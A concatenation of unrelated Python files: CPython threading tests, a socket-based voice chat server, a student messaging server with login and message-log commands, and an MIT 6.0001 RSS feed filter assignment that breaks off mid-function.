stdout=subprocess.PIPE, stderr=subprocess.PIPE)
stdout, stderr = p.communicate()
data = stdout.decode().replace('\r', '')
self.assertEqual(p.returncode, 0, "Unexpected error: " + stderr.decode())
self.assertEqual(data, expected_output)
def test_print_exception(self):
script = r"""if True:
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_1(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
sys.stderr = None
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
err = err.decode()
self.assertIn("Exception in thread", err)
self.assertIn("Traceback (most recent call last):", err)
self.assertIn("ZeroDivisionError", err)
self.assertNotIn("Unhandled exception", err)
def test_print_exception_stderr_is_none_2(self):
script = r"""if True:
import sys
import threading
import time
running = False
def run():
global running
running = True
while running:
time.sleep(0.01)
1/0
sys.stderr = None
t = threading.Thread(target=run)
t.start()
while not running:
time.sleep(0.01)
running = False
t.join()
"""
rc, out, err = assert_python_ok("-c", script)
self.assertEqual(out, b'')
self.assertNotIn("Unhandled exception", err.decode())
def test_bare_raise_in_brand_new_thread(self):
def bare_raise():
raise
class Issue27558(threading.Thread):
exc = None
def run(self):
try:
bare_raise()
except Exception as exc:
self.exc = exc
thread = Issue27558()
thread.start()
thread.join()
self.assertIsNotNone(thread.exc)
self.assertIsInstance(thread.exc, RuntimeError)
# explicitly break the reference cycle to not leak a dangling thread
thread.exc = None
class ThreadRunFail(threading.Thread):
def run(self):
raise ValueError("run failed")
class ExceptHookTests(BaseTestCase):
def test_excepthook(self):
with support.captured_output("stderr") as stderr:
thread = ThreadRunFail(name="excepthook thread")
thread.start()
thread.join()
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {thread.name}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("run failed")', stderr)
self.assertIn('ValueError: run failed', stderr)
@support.cpython_only
def test_excepthook_thread_None(self):
# threading.excepthook called with thread=None: log the thread
# identifier in this case.
with support.captured_output("stderr") as stderr:
try:
raise ValueError("bug")
except Exception as exc:
args = threading.ExceptHookArgs([*sys.exc_info(), None])
try:
threading.excepthook(args)
finally:
# Explicitly break a reference cycle
args = None
stderr = stderr.getvalue().strip()
self.assertIn(f'Exception in thread {threading.get_ident()}:\n', stderr)
self.assertIn('Traceback (most recent call last):\n', stderr)
self.assertIn(' raise ValueError("bug")', stderr)
self.assertIn('ValueError: bug', stderr)
def test_system_exit(self):
class ThreadExit(threading.Thread):
def run(self):
sys.exit(1)
# threading.excepthook() silently ignores SystemExit
with support.captured_output("stderr") as stderr:
thread = ThreadExit()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(), '')
def test_custom_excepthook(self):
args = None
def hook(hook_args):
nonlocal args
args = hook_args
try:
with support.swap_attr(threading, 'excepthook', hook):
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(args.exc_type, ValueError)
self.assertEqual(str(args.exc_value), 'run failed')
self.assertEqual(args.exc_traceback, args.exc_value.__traceback__)
self.assertIs(args.thread, thread)
finally:
# Break reference cycle
args = None
def test_custom_excepthook_fail(self):
def threading_hook(args):
raise ValueError("threading_hook failed")
err_str = None
def sys_hook(exc_type, exc_value, exc_traceback):
nonlocal err_str
err_str = str(exc_value)
with support.swap_attr(threading, 'excepthook', threading_hook), \
support.swap_attr(sys, 'excepthook', sys_hook), \
support.captured_output('stderr') as stderr:
thread = ThreadRunFail()
thread.start()
thread.join()
self.assertEqual(stderr.getvalue(),
'Exception in threading.excepthook:\n')
self.assertEqual(err_str, 'threading_hook failed')
class TimerTests(BaseTestCase):
def setUp(self):
BaseTestCase.setUp(self)
self.callback_args = []
self.callback_event = threading.Event()
def test_init_immutable_default_args(self):
# Issue 17435: constructor defaults were mutable objects, they could be
# mutated via the object attributes and affect other Timer objects.
timer1 = threading.Timer(0.01, self._callback_spy)
timer1.start()
self.callback_event.wait()
timer1.args.append("blah")
timer1.kwargs["foo"] = "bar"
self.callback_event.clear()
timer2 = threading.Timer(0.01, self._callback_spy)
timer2.start()
self.callback_event.wait()
self.assertEqual(len(self.callback_args), 2)
self.assertEqual(self.callback_args, [((), {}), ((), {})])
timer1.join()
timer2.join()
def _callback_spy(self, *args, **kwargs):
self.callback_args.append((args[:], kwargs.copy()))
self.callback_event.set()
class LockTests(lock_tests.LockTests):
locktype = staticmethod(threading.Lock)
@unittest.skip('dummy Python implementation of RLock is not thread-safe')
class PyRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._PyRLock)
@unittest.skipIf(threading._CRLock is None, 'RLock not implemented in C')
class CRLockTests(lock_tests.RLockTests):
locktype = staticmethod(threading._CRLock)
class EventTests(lock_tests.EventTests):
eventtype = staticmethod(threading.Event)
class ConditionAsRLockTests(lock_tests.RLockTests):
# Condition uses an RLock by default and exports its API.
locktype = staticmethod(threading.Condition)
class ConditionTests(lock_tests.ConditionTests):
condtype = staticmethod(threading.Condition)
class SemaphoreTests(lock_tests.SemaphoreTests):
semtype = staticmethod(threading.Semaphore)
class BoundedSemaphoreTests(lock_tests.BoundedSemaphoreTests):
semtype = staticmethod(threading.BoundedSemaphore)
class BarrierTests(lock_tests.BarrierTests):
barriertype = staticmethod(threading.Barrier)
class MiscTestCase(unittest.TestCase):
def test__all__(self):
extra = {"ThreadError"}
blacklist = {'currentThread', 'activeCount'}
support.check__all__(self, threading, ('threading', '_thread'),
extra=extra, blacklist=blacklist)
class InterruptMainTests(unittest.TestCase):
def test_interrupt_main_subthread(self):
# Calling start_new_thread with a function that executes interrupt_main
# should raise KeyboardInterrupt upon completion.
def call_interrupt():
_thread.interrupt_main()
t = threading.Thread(target=call_interrupt)
with self.assertRaises(KeyboardInterrupt):
t.start()
t.join()
t.join()
def test_interrupt_main_mainthread(self):
# Make sure that if interrupt_main is called in main thread that
# KeyboardInterrupt is raised instantly.
with self.assertRaises(KeyboardInterrupt):
_thread.interrupt_main()
def test_interrupt_main_noerror(self):
handler = signal.getsignal(signal.SIGINT)
try:
# No exception should arise.
signal.signal(signal.SIGINT, signal.SIG_IGN)
_thread.interrupt_main()
signal.signal(signal.SIGINT, signal.SIG_DFL)
_thread.interrupt_main()
finally:
# Restore original handler
signal.signal(signal.SIGINT, handler)
if __name__ == "__main__":
unittest.main()
|
server.py
|
import signal
import sys
import logging
from socket import socket, AF_INET, SOCK_STREAM, SOCK_DGRAM
from threading import Thread
logger = logging.getLogger(__name__)
logger.setLevel(logging.DEBUG)
logger.addHandler(logging.StreamHandler())
class Server:
def __init__(self, host='', port=4000, buffer_size=4096):
self._host = host
self._port = port
self._buffer_size = buffer_size
self._addresses = {}
self._server = socket(family=AF_INET, type=SOCK_STREAM)
self._accept_thread = None
self._voice_server = VoiceServer()
self._voice_server.start()
# must handle any signals to kill gracefully
signal.signal(signal.SIGINT, self._handler)
@property
def server(self):
return self._server
def start(self):
logger.debug('Starting server...')
try:
self._server.bind((self._host, self._port))
self._server.listen(2)
logger.debug('Waiting for connections...')
self._accept_thread = Thread(target=self._handle_connections)
self._accept_thread.start()
except OSError:
            logger.error('Server busy, something went wrong!')
def _handle_connections(self):
while True:
try:
socket_client, address = self._server.accept()
client = Client(
address,
socket_client,
buffer_size=self._buffer_size,
broadcast_callback=self._broadcast_sound,
disconnected_callback=self._client_disconnected
)
logger.debug(f'({client}) is connected..')
client.listen()
# Thread(target=self._client_connection, args=(client,)).start()
self._addresses[address] = client
except ConnectionAbortedError as e:
logger.error(f'ERROR: {e.errno}')
if e.errno == 53: # Software caused connection abort
break
continue
def _client_connection(self, client):
while True:
data = client.recv(self._buffer_size)
if len(data) == 0: # we have a disconnect...
logger.debug(f'Client: {client.getpeername()} disconnected')
self._addresses.pop(client.getpeername(), None)
break
self._broadcast_sound(client, data)
def _client_disconnected(self, client):
logger.debug(f'Client: {client} disconnected')
self._addresses.pop(str(client), None)
def _broadcast_sound(self, client_socket, data_to_be_sent):
for address in self._addresses:
client = self._addresses[address]
if client != client_socket:
client.broadcast(data_to_be_sent)
def _handler(self, signum, frame):
if signum == 2:
self._server.close()
self._accept_thread.join()
            # It is unclear why the accept thread does not shut down cleanly here; it is dead by this point, though
# print(self._accept_thread.isAlive())
# time.sleep(.5)
sys.exit(0)
def get_clients(self):
return self._addresses
class VoiceServer:
def __init__(self, host='', port=6666, buffer_size=4096):
self._host = host
self._port = port
self._buffer_size = buffer_size
self._server = socket(family=AF_INET, type=SOCK_DGRAM)
self._accept_thread = None
def start(self):
logger.debug('Starting voice server...')
try:
self._server.bind((self._host, self._port))
logger.debug('Waiting for connections...')
self._accept_thread = Thread(target=self._handle)
self._accept_thread.start()
except OSError as e:
            logger.error('Voice server busy, something went wrong!')
def _handle(self):
while True:
# get the data sent to us
data, ip = self._server.recvfrom(1024)
# display
print("{}: {}".format(ip, data.decode(encoding="utf-8").strip()))
# echo back
self._server.sendto(data, ip)
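# A minimal UDP client sketch for exercising the VoiceServer echo loop above
# (illustrative only, not part of the original file; host and port are assumptions
# matching the defaults in VoiceServer.__init__):
#
#   from socket import socket, AF_INET, SOCK_DGRAM
#   s = socket(AF_INET, SOCK_DGRAM)
#   s.sendto(b'hello', ('127.0.0.1', 6666))
#   print(s.recvfrom(1024))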
class Client:
def __init__(self, address, client, buffer_size=4096, broadcast_callback=None, disconnected_callback=None):
self.address = address
self.client = client
self.disconnected = False
self._buffer_size = buffer_size
self._broadcast_callback = broadcast_callback
self._disconnected_callback = disconnected_callback
def __str__(self):
return str(self.address)
def listen(self,):
Thread(target=self._listen).start()
def broadcast(self, data):
self.client.sendall(data)
def _listen(self):
while True:
try:
data = self.client.recv(self._buffer_size)
if len(data) == 0: # we have a disconnect...
self.disconnected = True
self.client.close()
if self._disconnected_callback is not None:
self._disconnected_callback(self)
break
if self._broadcast_callback is not None:
self._broadcast_callback(self, data)
except ConnectionResetError as e:
self.disconnected = True
if self._disconnected_callback is not None:
self._disconnected_callback(self)
if e.errno == 54:
logger.error('ERR: 54 Connection reset by peer')
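# A minimal entry-point sketch, assuming this module is run directly; the original
# file defines no __main__ block, and the host/port values below are illustrative
# defaults taken from Server.__init__.
if __name__ == '__main__':
    chat_server = Server(host='', port=4000)
    chat_server.start()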
|
testserver.py
|
# Python 3
# coding: utf-8
import sys
from socket import *
import threading
import time
import datetime as dt
# Read the port number and the number of allowed failed attempts from sys.argv
serverPort = sys.argv[1]
nb_failed = sys.argv[2]
serverPort = int(serverPort)
nb_failed = int(nb_failed)
# The number of allowed failed attempts should be in the range 1-5
while nb_failed > 5 or nb_failed <= 0:
    nb_failed = int(input("The allowable attempts should be between 1 and 5: "))
# The client login information is stored in this dict
# We keep it for later authentication use
credentials = {}
with open('Credentials.txt') as f:
for line in f:
line = line.strip()
value = line.split()
credentials[value[0]] = value[1]
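# Expected Credentials.txt layout (an assumption inferred from the parsing above):
# one whitespace-separated "username password" pair per line, e.g.
#   alice secret123
#   bob hunter2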
# This dict will contain info about blocked account
blocklist = {}
# We also need store the information of message log and user log
logseq = 0
msgseq = 0
msglogall = []
userlog = []
# We need to create the log files in case they do not exist (overwritten every time the server starts)
f = open("userlog.txt", 'w')
f.close()
f = open('messagelog.txt', 'w')
f.close()
# This is the authentication process
def authentication(client_sock, addr):
global nb_failed
global credentials
global blocklist
global logseq
global userlog
attempt = 0
# We ask for the username and check if it is correct
name = False
# I also checked if the username is valid
# However, the test case will not include this situation
while not name:
client_sock.send("Username\r\n".encode('utf-8'))
username = client_sock.recv(2048)
username = username.decode()
if username not in credentials:
attempt += 1
if attempt == nb_failed:
client_sock.send("Locked\r\n".encode('utf-8'))
                return False
client_sock.send("Invalid username\r\n".encode('utf-8'))
else:
name = True
client_sock.send("Password\r\n".encode('utf-8'))
# If the username is correct, we then check if the password is correct
passw = False
while not passw:
password = client_sock.recv(2048)
password = password.decode()
# If this account is in the block list
# We test if the timestamp has passed 10 seconds
if username in blocklist:
if dt.datetime.now() <= blocklist[username]:
client_sock.send("Still locked\r\n".encode('utf-8'))
client_sock.close()
                return False
else:
# If the block time has passed, we remove this account from block list
del blocklist[username]
# Next we check the password
if credentials[username] == password:
client_sock.send("Login Success\r\n".encode('utf-8'))
            # The login is successful, so we record the seq number, timestamp, username, host and UDP port number
udpport = client_sock.recv(2048)
udpport = udpport.decode('utf-8')
host, port = client_sock.getpeername()
currtime = dt.datetime.now()
date_time = currtime.strftime("%d %b %Y %H:%M:%S")
logseq += 1
# We have all the info, then write them into the log
logEntry = str(logseq) + '; ' + date_time + '; ' + username + '; ' + str(host) + '; ' + udpport + '\n'
f = open('userlog.txt', 'a')
f.write(logEntry)
f.close()
# We also save a copy in a list we defined (for later use)
entry = '; ' + date_time + '; ' + username + '; ' + str(host) + '; ' + udpport + '\n'
userlog.append(entry)
return username
else:
attempt += 1
if attempt >= nb_failed:
client_sock.send("Locked\r\n".encode('utf-8'))
# We add 10 seconds to the timestamp so we can compare it directly with the current time
blocklist[username] = dt.datetime.now() + dt.timedelta(seconds=10)
client_sock.close()
return False
client_sock.send("Invalid Password\r\n".encode('utf-8'))
# This function is used to add the posted message to the log file
def msg(client_sock, info, username):
global msgseq
global msglogall
# We need seq number, timestamp, and edited info so we can write into the file
msgseq += 1
currtime = dt.datetime.now()
date_time = currtime.strftime("%d %b %Y %H:%M:%S")
edited = 'no'
# save them into the list (for later use)
entry = '; ' + date_time + '; ' + username + '; ' + info + '; ' + edited + '\n'
msglogall.append(entry)
# Write this message into the file
logentry = str(msgseq) + '; ' + date_time + '; ' + username + '; ' + info + '; ' + edited + '\n'
f = open('messagelog.txt', 'a')
f.write(logentry)
f.close()
# Send a confirm message to the user and print this operation
confirm = str(msgseq) + ' ' + date_time
client_sock.send(confirm.encode('utf-8'))
servermsg = username + ' posted MSG #' + str(msgseq) + ' ' + '"' + info + '"' + ' at ' + date_time + '\n'
print(servermsg)
# This function is used to delete the message
def dlt(client_sock, times, seq, user):
global msglogall
global msgseq
date_time = dt.datetime.now()
currtime = date_time.strftime("%d %b %Y %H:%M:%S")
# First, we check if the sequence number of the message is valid
seq = int(seq)
seq = seq - 1
if seq >= len(msglogall) or seq < 0:
print(user + " trys to delete MSG #" + str(
seq + 1) + " at " + currtime + " but failed. Reason: Invalid sequence number\n")
client_sock.send('Seq'.encode('utf-8'))
return
# If seq is correct, we check the user
entry = msglogall[seq].split('; ')
if entry[2] != user:
print(
user + " trys to delete MSG #" + str(
seq + 1) + " at " + currtime + " but failed. Reason: Authorisation fails\n")
client_sock.send('User'.encode('utf-8'))
return
# Then timestamp
if entry[1] != times:
print(user + " trys to delete MSG #" + str(
seq + 1) + " at " + currtime + " but failed. Reason: Invalid timestamp\n")
client_sock.send('Timestamp'.encode('utf-8'))
return
# All matches. We delete the message
del msglogall[seq]
msgseq -= 1
print(user + " deletes MSG #" + str(seq + 1) + " at " + currtime + "\n")
client_sock.send('Delete'.encode('utf-8'))
client_sock.send(currtime.encode('utf-8'))
    # Write the updated msg list into the file (all indices are now automatically corrected)
f = open('messagelog.txt', 'w')
index = 0
for i in msglogall:
index += 1
f.write(str(index) + i)
f.close()
# This function is used to edit the posted message
# Very similar to DLT
def edt(client_sock, times, seq, user, msge):
global msglogall
date_time = dt.datetime.now()
currtime = date_time.strftime("%d %b %Y %H:%M:%S")
# First, we check if the sequence number of the message is valid
seq = int(seq)
seq = seq - 1
if seq >= len(msglogall) or seq < 0:
print(user + " trys to edit MSG #" + str(
seq + 1) + " at " + currtime + " but failed. Reason: Invalid sequence number\n")
client_sock.send('Seq'.encode('utf-8'))
return
# If seq is correct, we check the user
entry = msglogall[seq].split('; ')
if entry[2] != user:
print(
user + " trys to edit MSG #" + str(
seq + 1) + " at " + currtime + " but failed. Reason: Authorisation fails\n")
client_sock.send('User'.encode('utf-8'))
return
# Then timestamp
if entry[1] != times:
print(user + " trys to edit MSG #" + str(
seq + 1) + " at " + currtime + " but failed. Reason: Invalid timestamp\n")
client_sock.send('Timestamp'.encode('utf-8'))
return
    # All matches. We edit the message
    msglogall[seq] = '; ' + currtime + '; ' + user + '; ' + msge + '; ' + 'Yes' + '\n'
    print(user + " edits MSG #" + str(seq + 1) + ' ' + '"' + msge + '"' + " at " + currtime + "\n")
confirm = 'Edit ' + currtime
client_sock.send(confirm.encode('utf-8'))
    # Write the updated msg list into the file (all indices are now automatically corrected)
f = open('messagelog.txt', 'w')
index = 0
for i in msglogall:
index += 1
f.write(str(index) + i)
f.close()
# This is the implementation of the rdm function
def rdm(times):
global msglogall
index = 0
result = ''
# We went through every element in the msglogall list
# It contains all the information in the messagelog.txt
for entry in msglogall:
index += 1
entrylist = entry.split('; ')
stamp = entrylist[1]
        # We can directly check whether the message timestamp is newer than the requested time
if stamp > times:
result += str(index) + entry
    # We have to go through the whole list because there might be modified messages with newer timestamps
if result == '':
result = 'No new message since ' + times + '\n'
return result
# The ATU command returns the currently active users
def atu(user):
global userlog
result = ''
# If there is only one user (which is the user him/herself), return
if len(userlog) == 1:
result = 'No other active user\n'
print(result)
return result
index = 0
# Go through the whole list and skip the user him/herself
# Append the valid entry and finally return it
for i in userlog:
index += 1
listuser = i.split("; ")
if user == listuser[2]:
continue
else:
result += str(index) + i
print('Return the active user list:\n' + result)
return result
def out(user):
global userlog
global logseq
index = 0
# We need to find the user who wants to logout
# Delete this entry
for i in userlog:
listuser = i.split("; ")
if user == listuser[2]:
del userlog[index]
logseq -= 1
break
index += 1
    # After we find the user and delete the entry,
    # we need to update userlog.txt
f = open('userlog.txt', 'w')
index = 0
for i in userlog:
index += 1
f.write(str(index) + i)
f.close()
# This is the per-client handler function
# It takes the socket, address, and username as arguments
def recv_handler(con, addr, user):
global userlog
print('Server is ready for service')
    while True:
        # Now we have passed the authentication part, we need to process the next command
        allcommand = con.recv(2048).decode('utf-8')
        # The first three chars define which function we need to call
        # All command fields are separated by spaces
command = allcommand[0:3]
# For MSG, the rest is the only argument
if command == 'MSG':
info = allcommand[4::]
msg(con, info, user)
# For DLT, there is seq number, times, username
elif command == 'DLT':
info = allcommand[4::]
info = info.split()
seq = info[0]
seq = seq.replace('#', '')
times = ' '.join(info[1::])
dlt(con, times, seq, user)
        # For EDT, it is similar to DLT, except there is also the new message
elif command == 'EDT':
info = allcommand[4::]
info = info.split()
seq = info[0]
seq = seq.replace('#', '')
times = ' '.join(info[1:5])
msge = ' '.join(info[5::])
edt(con, times, seq, user, msge)
# For RDM, there is only the time stamp
elif command == 'RDM':
print(user + " issued RDM command.\n")
times = allcommand[4::]
returned = rdm(times)
            con.send(returned.encode('utf-8'))
print(returned)
# ATU and OUT does not take argument
elif command == 'ATU':
print(user + ' issued ATU command.\n')
info = atu(user)
print(info+"\n")
            con.send(info.encode('utf-8'))
        # The UPD command can find everything it needs in the userlog entries
elif command == 'UPD':
info = allcommand[4::]
# We need to find the user and if cannot find then send offline
isoffline = 'Offline'
for i in userlog:
listuser = i.split("; ")
if info == listuser[2]:
isoffline = listuser[3] + ' ' + listuser[4]
break
            con.send(isoffline.encode('utf-8'))
# This is the out command
elif command == 'OUT':
print(user + ' logged out\n')
out(user)
# Send an out message to the client
            con.send('out'.encode('utf-8'))
break
    con.close()
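# Wire-format summary of the commands handled above (derived from the parsing in
# recv_handler; the concrete values are illustrative):
#   MSG <message text>
#   DLT #<seq> <dd Mon YYYY HH:MM:SS>
#   EDT #<seq> <dd Mon YYYY HH:MM:SS> <new message text>
#   RDM <dd Mon YYYY HH:MM:SS>
#   ATU
#   UPD <username>
#   OUT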
# Create the TCP welcoming socket for the server
serverSocket = socket(AF_INET, SOCK_STREAM)
serverSocket.setsockopt(SOL_SOCKET, SO_REUSEADDR, 1)
serverSocket.bind(('127.0.0.1', serverPort))
serverSocket.listen(5)
# The main thread
while True:
    # Once a client connects, we record the socket and address and pass them to the authentication part
    # If they pass the authentication, we will have a username representing this client
client_sock, client_addr = serverSocket.accept()
user = authentication(client_sock, client_addr)
# If the authentication passed, we start a new thread for the following command
# If not, we close the socket
if not user:
client_sock.close()
else:
# Prevent timing out
#serverSocket.setblocking(1)
thread = threading.Thread(target=recv_handler, args=(client_sock, client_addr, user,))
thread.start()
|
ps5.py
|
# 6.0001/6.00 Problem Set 5 - RSS Feed Filter
# Name: Alon Parag
# Collaborators:
# Time:From 04.01.2021 19:31 to 06.01.2021 13:18
# NOTE: TEST_3_BEFORE_AND_AFTER_TRIGGER FAILS AS THERE IS NO TZINFO PASSED, TEST_3_ALT_BEFORE_AND_AFTER_TRIGGER PASSES
import feedparser
import string
import time
import threading
from project_util import translate_html
from mtTkinter import *
from datetime import datetime
import pytz
import string
import re
#-----------------------------------------------------------------------
#======================
# Code for retrieving and parsing
# Google and Yahoo News feeds
# Do not change this code
#======================
def process(url):
"""
Fetches news items from the rss url and parses them.
Returns a list of NewsStory-s.
"""
feed = feedparser.parse(url)
entries = feed.entries
ret = []
for entry in entries:
guid = entry.guid
title = translate_html(entry.title)
link = entry.link
description = translate_html(entry.description)
pubdate = translate_html(entry.published)
try:
pubdate = datetime.strptime(pubdate, "%a, %d %b %Y %H:%M:%S %Z")
pubdate.replace(tzinfo=pytz.timezone("GMT"))
# pubdate = pubdate.astimezone(pytz.timezone('EST'))
# pubdate.replace(tzinfo=None)
except ValueError:
pubdate = datetime.strptime(pubdate, "%a, %d %b %Y %H:%M:%S %z")
newsStory = NewsStory(guid, title, description, link, pubdate)
ret.append(newsStory)
return ret
#======================
# Data structure design
#======================
# Problem 1
# TODO: NewsStory
class NewsStory(object):
"""
Class to manipulate RSS feed News
Takes in
guid: string
title: string
description: string
link: string
pubdate: datetime
"""
def __init__(self, guid, title, description, link, pubdate):
try:
assert type(guid) == str, 'Error: guid should be of type str'
assert type(title) == str, 'Error: title should be of type str'
assert type(description) == str, 'Error: description should be of type str'
assert type(link) == str, 'Error: link should be of type str'
assert type(pubdate) == datetime, 'Error: pubdate should be of type datetime'
except AssertionError as identifier:
print(identifier)
except:
            print('Unexpected error occurred')
else:
self.__guid = guid
self.__title = title
self.__description = description
self.__link = link
self.__pubdate = pubdate
def get_guid(self):
"""Returns:
            string representing the GUID
"""
return self.__guid
def get_title(self):
"""Returns:
string representing title
"""
return self.__title
def get_description(self):
"""
Returns:
            string representing the description
"""
return self.__description
def get_link(self):
"""Returns:
string representing link
"""
return self.__link
def get_pubdate(self):
"""Returns:
datetime object representing pubdate
"""
return self.__pubdate
#======================
# Triggers
#======================
class Trigger(object):
def evaluate(self, story):
"""
Returns True if an alert should be generated
for the given news item, or False otherwise.
"""
# DO NOT CHANGE THIS!
raise NotImplementedError
# PHRASE TRIGGERS
# Problem 2
# TODO: PhraseTrigger
class PhraseTrigger(Trigger):
"""
    Trigger that fires when a given phrase occurs in a piece of text
"""
def __init__(self, phrase):
"""
Assumes:
phrase: alphabetic string
Returns:
instance of class PhraseTrigger
"""
try:
for char in string.punctuation:
                assert char not in phrase, "Error, phrase should not contain any of the following characters: " + string.punctuation
            assert len(phrase.split(' ')) >= 1, "Error, the phrase should contain at least one word"
            for e in phrase.split(' '):
                assert len(e) > 0, 'Error, words in the phrase should be separated by a single space'
except AssertionError:
pass
else:
self.__phrase = phrase.lower()
def is_phrase_in(self, text):
"""
Assumes:
text: string
Returns:
True if self.__phrase in text
otherwise False
"""
# remove punctuation and multiple spaces
text = re.sub('[!"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~]', ' ', text)
text = re.sub('( )+', ' ', text).lower()
# check if phrase is in text
return True if re.search(r'\b%s\b' %self.__phrase, text) else False
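# Illustrative behaviour of is_phrase_in (hypothetical inputs, worked out from the
# regular expressions above; not part of the original file):
#   PhraseTrigger('purple cow').is_phrase_in('The purple cow is soft!')  -> True
#   PhraseTrigger('purple cow').is_phrase_in('Purple cows are cool')     -> False (no word-boundary match)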
# Problem 3
# TODO: TitleTrigger
class TitleTrigger(PhraseTrigger):
"""
    Inherits from PhraseTrigger; fires when the given phrase appears in the title
"""
def __init__(self, phrase):
"""
Assumes:
            phrase is an alphabetic string
        Returns:
            a TitleTrigger object
"""
PhraseTrigger.__init__(self, phrase)
def evaluate(self, story):
"""
Assumes:
story: NewsStory instance
Returns:
True if phrase in title, otherwise False
"""
title = story.get_title()
return self.is_phrase_in(title)
# Problem 4
# TODO: DescriptionTrigger
class DescriptionTrigger(PhraseTrigger):
"""
    Inherits from PhraseTrigger; fires when the given phrase appears in the description
"""
def __init__(self, phrase):
"""
Assumes:
            phrase is an alphabetic string
        Returns:
            a DescriptionTrigger object
"""
PhraseTrigger.__init__(self, phrase)
def evaluate(self, story):
"""
Assumes:
story: NewsStory instance
Returns:
True if phrase in Description, otherwise False
"""
description = story.get_description()
return self.is_phrase_in(description)
# TIME TRIGGERS
# Problem 5
# TODO: TimeTrigger
# Constructor:
# Input: Time has to be in EST and in the format of "%d %b %Y %H:%M:%S".
# Convert time from string to a datetime before saving it as an attribute.
class TimeTrigger(Trigger):
"""
abstract class for time triggers
"""
def __init__(self, time):
"""
Assumes:
time: datetime object with tzname "EST"
Returns:
TimeTrigger object
"""
try:
            pattern = re.compile(r'([1-9]|(0[1-9])|([1-2][0-9])|(3[0-1]))\s[A-Z][a-z]{2}\s[0-9]{4}\s(([2][0-3])|([0-1][0-9])):[0-5][0-9]:[0-5][0-9]')
assert bool(pattern.match(time)), 'Error, time should follow the pattern "01 Oct 2009 00:00:00"'
except AssertionError:
pass
else:
est = pytz.timezone('EST')
self.__time = datetime.strptime(time, r'%d %b %Y %H:%M:%S')
self.__time = self.__time.replace(tzinfo = est)
def get_time(self):
return self.__time
def evaluate(self, story):
"""
        abstract method, to be implemented by subclasses
"""
raise NotImplementedError
# Problem 6
# TODO: BeforeTrigger and AfterTrigger
class BeforeTrigger(TimeTrigger):
"""
TimeTrigger that fires when a NewsStory object pubdate is strictly before the given time
"""
def __init__(self, time):
super().__init__(time)
print('object:', self.__dict__)
print('trigger time:', self.get_time())
def is_before(self, time):
"""
Assumes:
time: datetime object tz=EST
Returns:
True if time is before self.get_time(), otherwise false
"""
return time<self.get_time()
def evaluate(self, story: NewsStory):
"""
Assumes:
story: NewsStory object
Returns:
True if NewsStory was published before self.get_time(), otherwise False
"""
return self.is_before(story.get_pubdate())
class AfterTrigger(TimeTrigger):
"""
TimeTrigger that fires when a NewsStory object pubdate is strictly after the given time
"""
def __init__(self, time):
super().__init__(time)
print('object:', self.__dict__)
print('trigger time:', self.get_time())
def is_after(self, time):
"""
Assumes:
time: datetime object tz=EST
Returns:
True if time is after self.get_time(), otherwise false
"""
return time>self.get_time()
def evaluate(self, story: NewsStory):
"""
Assumes:
story: NewsStory object
Returns:
True if NewsStory was published after self.get_time(), otherwise False
"""
return self.is_after(story.get_pubdate())
# COMPOSITE TRIGGERS
# Problem 7
# TODO: NotTrigger
class NotTrigger(Trigger):
"""
    Inverts the output of a given trigger
"""
def __init__(self, trigger: Trigger):
"""
Assumes:
            trigger: a Trigger instance
Returns:
NotTrigger instance
"""
self.__trigger = trigger
def get_trigger(self):
"""
Returns:
Trigger object
"""
return self.__trigger
def evaluate(self, story):
"""
Assumes:
story: NewsStory object
Returns:
boolean inverse of the trigger attribute
"""
return not self.get_trigger().evaluate(story)
# Problem 8
# TODO: AndTrigger
class AndTrigger(Trigger):
"""
logical AND of two triggers
"""
def __init__(self, trigger_1: Trigger, trigger_2: Trigger):
"""
Assumes:
            trigger: a Trigger instance
Returns:
AndTrigger instance
"""
self.__trigger_1 = trigger_1
self.__trigger_2 = trigger_2
def get_trigger_1(self):
"""
Returns:
Trigger_1 object
"""
return self.__trigger_1
def get_trigger_2(self):
"""
Returns:
Trigger_2 object
"""
return self.__trigger_2
def evaluate(self, story):
"""
Assumes:
story: NewsStory object
Returns:
            logical AND of the two triggers' evaluations
"""
return self.get_trigger_1().evaluate(story) and self.get_trigger_2().evaluate(story)
# Problem 9
# TODO: OrTrigger
class OrTrigger(Trigger):
"""
    logical OR of two triggers
"""
def __init__(self, trigger_1: Trigger, trigger_2: Trigger):
"""
Assumes:
            trigger: a Trigger instance
Returns:
OrTrigger instance
"""
self.__trigger_1 = trigger_1
self.__trigger_2 = trigger_2
def get_trigger_1(self):
"""
Returns:
Trigger_1 object
"""
return self.__trigger_1
def get_trigger_2(self):
"""
Returns:
Trigger_2 object
"""
return self.__trigger_2
def evaluate(self, story):
"""
Assumes:
story: NewsStory object
Returns:
boolean operator OR of the two triggers
"""
return self.get_trigger_1().evaluate(story) or self.get_trigger_2().evaluate(story)
#======================
# Filtering
#======================
# Problem 10
def filter_stories(stories, triggerlist):
"""
Takes in a list of NewsStory instances.
Returns: a list of only the stories for which a trigger in triggerlist fires.
"""
# TODO: Problem 10
filtered_stories = []
for story in stories:
for trigger in triggerlist:
if trigger.evaluate(story):
                filtered_stories.append(story)
                break  # stop after the first matching trigger so a story is added only once
return filtered_stories
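# Illustrative use of filter_stories (hypothetical trigger phrases; the feed URL is
# the one polled further below):
#   triggerlist = [TitleTrigger('election'), DescriptionTrigger('climate')]
#   matching = filter_stories(process("http://news.google.com/news?output=rss"), triggerlist)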
#======================
# User-Specified Triggers
#======================
# Problem 11
def read_trigger_config(filename):
"""
filename: the name of a trigger configuration file
Returns: a list of trigger objects specified by the trigger configuration
file.
"""
# We give you the code to read in the file and eliminate blank lines and
# comments. You don't need to know how it works for now!
